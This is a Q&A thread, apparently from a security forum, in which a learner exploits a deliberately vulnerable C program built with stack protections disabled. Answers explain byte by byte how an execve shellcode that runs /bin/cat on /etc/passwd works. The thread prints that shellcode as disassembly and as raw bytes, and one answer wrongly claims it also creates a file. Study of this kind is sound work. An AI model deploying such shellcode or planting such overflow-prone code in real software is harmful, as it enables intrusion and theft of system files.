What lies behind this complicated shellcode on linux?

Question

It's pretty much my first time playing around with a buffer overflow exploit. I've written a simple C program that is vulnerable to buffer overflows:

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(void)
{
    char* filename = getenv("filename");
    char buff[128];

    strcpy(buff, filename); /* no bounds check: a long value overflows buff */
    return 0;
}

I compiled it like this on my Ubuntu Server 10.04 (i386) machine:

gcc vuln.c -o vuln -z execstack -fno-stack-protector

After finding out how many bytes of filename are needed to overwrite the return address, I tried injecting various types of shellcode. I pass a NOP slide, then the shellcode, then an address that leads back into the NOP slide, all through the filename environment variable. Common execve /bin/sh variants crashed with a segmentation fault inside their own code for some reason, but one oddly specific shellcode really did work for me:

Taken from https://www.exploit-db.com/exploits/38116/. It calls execve to run /bin/cat on /etc/passwd:

Disassembly of section .text:
08048060 <.text>:
 8048060:   eb 1f                   jmp    0x8048081
 8048062:   5b                      pop    %ebx
 8048063:   31 c0                   xor    %eax,%eax
 8048065:   88 43 0b                mov    %al,0xb(%ebx)
 8048068:   88 43 18                mov    %al,0x18(%ebx)
 804806b:   89 5b 19                mov    %ebx,0x19(%ebx)
 804806e:   8d 4b 0c                lea    0xc(%ebx),%ecx
 8048071:   89 4b 1d                mov    %ecx,0x1d(%ebx)
 8048074:   89 43 21                mov    %eax,0x21(%ebx)
 8048077:   b0 0b                   mov    $0xb,%al
 8048079:   8d 4b 19                lea    0x19(%ebx),%ecx
 804807c:   8d 53 21                lea    0x21(%ebx),%edx
 804807f:   cd 80                   int    $0x80
 8048081:   e8 dc ff ff ff          call   0x8048062
 8048086:   2f                      das    
 8048087:   2f                      das    
 8048088:   2f                      das    
 8048089:   2f                      das    
 804808a:   62 69 6e                bound  %ebp,0x6e(%ecx)
 804808d:   2f                      das    
 804808e:   63 61 74                arpl   %sp,0x74(%ecx)
 8048091:   23 2f                   and    (%edi),%ebp
 8048093:   2f                      das    
 8048094:   65 74 63                gs je  0x80480fa
 8048097:   2f                      das    
 8048098:   70 61                   jo     0x80480fb
 804809a:   73 73                   jae    0x804810f
 804809c:   77 64                   ja     0x8048102
 804809e:   23 41 4a                and    0x4a(%ecx),%eax
 80480a1:   49                      dec    %ecx
 80480a2:   54                      push   %esp
 80480a3:   48                      dec    %eax
 80480a4:   41                      inc    %ecx
 80480a5:   4a                      dec    %edx
 80480a6:   49                      dec    %ecx
 80480a7:   54                      push   %esp
 80480a8:   48                      dec    %eax
 80480a9:   4b                      dec    %ebx
 80480aa:   50                      push   %eax

Note that this is objdump output, not the original assembly source, which I couldn't find. It seems that the /bin/cat and /etc/passwd strings come after all those "2F" opcodes. A quick read-up on this opcode (das) led me to:

Adjusts the result of the subtraction of two packed BCD values to create a packed BCD result.

I have no idea what that means, though, or how this contributes to the shellcode. Can anyone try to explain it?

Moreover, I wanted to adjust this shellcode slightly so that it runs /bin/cat on a file path other than /etc/passwd, such as /home/kfir/helloworld, but the path gets cut off at /home/kfir/, which is the same length as /etc/passwd (11 characters).

score 4 · Accepted Answer · answered Mar 17 '17 at 22:33

If the shellcode you tried before relied on absolute addresses, that could explain the crashes. This shellcode survives because it uses call to obtain the absolute address of its own embedded data (which, in this exploit, sits on the stack) and then modifies that buffer in place without any other stack modifications.

For a full understanding, it might be illustrative to see what is happening, linearly:

8048060:    eb 1f                   jmp    0x8048081

Do a short, relative jump (eb) forward. After this 2-byte instruction executes, the instruction pointer is 0x8048060 + 2 = 0x8048062; adding 0x1f to that gives 0x8048081 as the next instruction.

8048081:    e8 dc ff ff ff          call   0x8048062

Call (e8) with an offset of -36 (0xffffffdc interpreted as a signed 32-bit integer), relative to the next instruction at 0x8048081 + 5 = 0x8048086, yielding 0x8048062. Note that call pushes the address of the next instruction (0x8048086) on the stack as the return address.

8048062:    5b                      pop    %ebx
8048063:    31 c0                   xor    %eax,%eax

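Pop the return address off the stack into the ebx register, so ebx now holds 0x8048086, the address of the data right after the call (in the real exploit, wherever that data ended up on the stack). Then set the eax register to zero. Now, let's have a look at a hexadecimal dump of the data starting at that return address: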

00000000: 2f2f 2f2f 6269 6e2f 6361 7423 2f2f 6574  ////bin/cat#//et
00000010: 632f 7061 7373 7764 2341 4a49 5448 414a  c/passwd#AJITHAJ
00000020: 4954 484b 50                             ITHKP

Clearly, these are not instructions, but the disassembler did not know that.

8048065:    88 43 0b                mov    %al,0xb(%ebx)

al is the low 8 bits of the eax register, which is zero, so this instruction overwrites the byte at offset 0xb (11) in the above data, replacing the # after ////bin/cat with a NUL byte.

Why not encode the NUL byte directly in the data? Often the buffer is copied only up to the first NUL byte (as strcpy does in the vulnerable program in the question), so shellcode containing a NUL byte would not be copied in full. Encoding a dummy value and overwriting it at run time avoids this limitation.

8048068:    88 43 18                mov    %al,0x18(%ebx)

Likewise, this replaces the # at offset 0x18 (after //etc/passwd, in the second line of the dump) with a NUL byte.

804806b:    89 5b 19                mov    %ebx,0x19(%ebx)

This overwrites AJIT in the above data (at offset 0x19) with the address of the buffer (starting at ////bin/cat). Note that ebx is a 32-bit register, so indeed it overwrites four bytes.

804806e:    8d 4b 0c                lea    0xc(%ebx),%ecx
8048071:    89 4b 1d                mov    %ecx,0x1d(%ebx)

This loads the address of //etc/passwd (at offset 0xc) into the ecx register and then overwrites HAJI (at offset 0x1d) with this value.

8048074:    89 43 21                mov    %eax,0x21(%ebx)

Overwrites THKP (at offset 0x21) with four zero bytes.

Now assume, for the sake of argument, that our data (pointed to by the ebx register) is at the 32-bit address 0xffff0000. After the above modifications, our data looks like this:

00000000: 2f2f 2f2f 6269 6e2f 6361 7400 2f2f 6574  ////bin/cat.//et
00000010: 632f 7061 7373 7764 0000 00ff ff0c 00ff  c/passwd........
00000020: ff00 0000 00                             .....

or, written in a more readable form with absolute memory addresses:

0xffff0000: "////bin/cat"
0xffff000c: "//etc/passwd"
0xffff0019: 0xffff0000 (address of first string, encoded in little-endian)
0xffff001d: 0xffff000c (address of second string)
0xffff0021: 0x00000000 (a NULL pointer)

Hmm, this looks like the arguments for the execve system call (sys_execve(char *filename, char **argv, char **envp)). On 32-bit x86 Linux (int $0x80), system call parameters are passed in the registers ebx, ecx and edx, while the system call number is passed in the eax register. So our first argument (ebx) already points to the ////bin/cat string (at 0xffff0000).

8048077:    b0 0b                   mov    $0xb,%al

Sets the syscall number to 11 (sys_execve on 32-bit x86). Since eax was already zeroed by the earlier xor, setting al alone makes eax equal 11.

8048079:    8d 4b 19                lea    0x19(%ebx),%ecx

Sets the second argument (ecx) to the address of the argument list (at 0xffff0019). In our case it contains two string pointers followed by a NULL pointer: ////bin/cat, //etc/passwd, NULL.

804807c:    8d 53 21                lea    0x21(%ebx),%edx

Sets the third argument (edx) to the address of the environment list (at 0xffff0021), which here contains only a NULL terminator. This is the same NULL pointer that terminates the argument list.

804807f:    cd 80                   int    $0x80

And finally invoke the syscall! Effectively, this code did the same as this C snippet:

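#include <stdio.h>   /* perror */
#include <unistd.h>  /* execve */

int main(void)
{
    char *argv[] = {
        "////bin/cat",
        "//etc/passwd",
        NULL
    };
    char *envp[] = {
        NULL
    };
    execve(argv[0], argv, envp);
    perror("execve");  /* reached only if execve fails */
    return 1;
}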

Wow, thank you so much! This explanation sorts out so many things for me. I do wonder, though: is there any benefit to using so many slashes (////bin)? — Kfir Eichenblat, Mar 18 '17 at 10:14
@Kfirprods One reason I can think of is alignment, but that should not be a problem on x86. Another possible reason is that removing the extra slashes would change the offsets, which could then result in the inclusion of `0a` (`\n`) or `0d` (`\r`). These characters (together with `00` (`\0`)) are often avoided since they cause truncation. — Lekensteyn, Mar 19 '17 at 12:07

DKNUCKLES · Answer 2 · 2017-03-17T15:23:08.663

The assembly that you've posted is not the shellcode, as you mentioned, but rather the unpacking and execution of the shell script.

The shellcode being executed is \xeb\x1f\x5b\x31\xc0\x88\x43\x0b\x88\x43\x18\x89\x5b\x19\x8d\x4b\x0c\x89\x4b\x1d\x89\x43\x21\xb0\x0b\x8d\x4b\x19\x8d\x53\x21\xcd\x80\xe8\xdc\xff\xff\xff\x2f\x2f\x2f\x2f\x62\x69\x6e\x2f\x63\x61\x74\x23\x2f\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64\x23\x41\x4a\x49\x54\x48\x41\x4a\x49\x54\x48\x4b\x50

This shellcode looks to simply perform the /bin/cat /etc/passwd command and create a file named ajith and chmod it to 7775

Based on the code on the Exploit-DB page, there does not appear to be any "offset" of bytes; it just runs the shellcode as is without trying to push it to a specific memory location. There does not appear to be a "buffer" offset in the C code, and based on your code your buffer is 128 bytes. As best I can tell, your exploit code is not exploiting the buffer overflow vulnerability; it is just able to run because you have a 75-byte shellcode and a 128-byte buffer.

In a simple buffer overflow example you would throw a bunch of dummy characters to get you to the ESP register (let's say 128 A's in this instance), and then you would execute your shellcode. To find the correct position of the offset you'd have to fuzz the application (which you've done) and adjust your exploit accordingly.

In terms of generating your own shellcode, I would suggest looking at MSFVenom which will allow you to easily tailor your shellcode to execute the exact command you wish and attempt to create it with the smallest possible code length.

Perhaps I should have mentioned this in the question's body, but I am the one pushing it into a specific memory location. I pass a NOP slide, then this shellcode, and then 4 bytes that overwrite the return address so that eip goes back to somewhere within the NOP slide, eventually executing this shellcode. However, my question is about the shellcode itself. How does it call /bin/cat? Normally I see shellcodes pushing their strings onto the stack, but I can't see that here. — Kfir Eichenblat, Mar 17 '17 at 14:13
P.S. The shellcode does not create a file named ajith. The comment on exploit-db may say so, but the author seems to have left it there after copy-pasting from another code sample. P.P.S. You said 'bits' several times when referring to bytes; just thought I should let you know. — Kfir Eichenblat, Mar 17 '17 at 14:57
@Kfirprods Thanks for the catch and the update re: the NOP slide. Truthfully, reading assembly is not my strong suit, but I might try to watch this in a debugger when I get home and see if I can figure out what's going on. — DKNUCKLES, Mar 17 '17 at 15:24
awesome, thanks. I'm hoping someone with great assembly experience sees this thread and tells us what this shellcode is doing differently :) — Kfir Eichenblat, Mar 17 '17 at 15:46
